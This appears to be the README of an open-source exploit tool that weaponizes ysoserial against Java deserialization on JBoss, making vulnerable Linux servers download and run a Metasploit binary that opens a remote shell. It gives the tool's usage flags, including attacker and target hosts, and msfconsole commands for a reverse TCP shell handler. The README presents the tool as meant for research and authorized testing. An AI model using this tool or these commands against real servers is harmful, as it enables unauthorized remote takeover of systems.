Home

Awesome

Java Deserialization Exploit

A tool which weaponizes frohoff's original ysoserial code to gain a remote shell on vulnerable Linux machines. See blog post at https://trustfoundry.net/exploiting-java-deserialization-on-jboss/ for a detailed write-up and demonstration.

Description

This tool builds upon the proof-of-concept ysoserial by Chris Frohoff (https://github.com/frohoff/ysoserial) and exploits the Java Deserialization vulnerability, using Metasploit Framework tools to generate a malicious binary and an embedded web server to transfer the payload to the victim. A slightly modified version of ysoserial is used to download and execute the binary on the victim's side.

Note: This tool is still in early stages of development, and many features have not yet been implemented. Only the JBoss platform on the Linux architecture is currently exploitable.

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Usage

$ java -jar JBossExploit.jar
usage: java -jar JBossExploit.jar -lhost <host> -lport <port> -payload
            <type> -rhost <host> -rport <port> -srvport <port> -uripath
            <uri>
 -help             Print this message
 -lhost <host>     IP Address of Attacking Machine
 -lport <port>     Port on which local handler is listening for a reverse TCP shell
 -payload <type>   Payload Type (Default: CommonsCollections1)
 -rhost <host>     Target Hostname or IP Address
 -rport <port>     Remote JBoss Port
 -srvport <port>   Port for local HTTP server
 -uripath <uri>    Target resource URI (Default: /invoker/JMXInvokerServlet)

Examples

Requirements

$ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
msf exploit(handler) > set LHOST <local ip>
msf exploit(handler) > set LPORT <local port>
msf exploit(handler) > exploit

Installation

As per GitHub's Community Guidelines, I have removed the executable JAR files from the releases page. You must now build the application from source using Maven. More information: https://help.github.com/articles/github-community-guidelines/#what-is-not-allowed

  1. Clone source code
  2. From the repo root directory, run 'mvn clean compile assembly:single"
  3. java -jar target/JBossExploit-0.5.2-alpha-jar-with-dependencies.jar

Contributing

  1. Fork the repo
  2. Create new feature branch
  3. Commit changes
  4. Push to branch
  5. Create Pull Request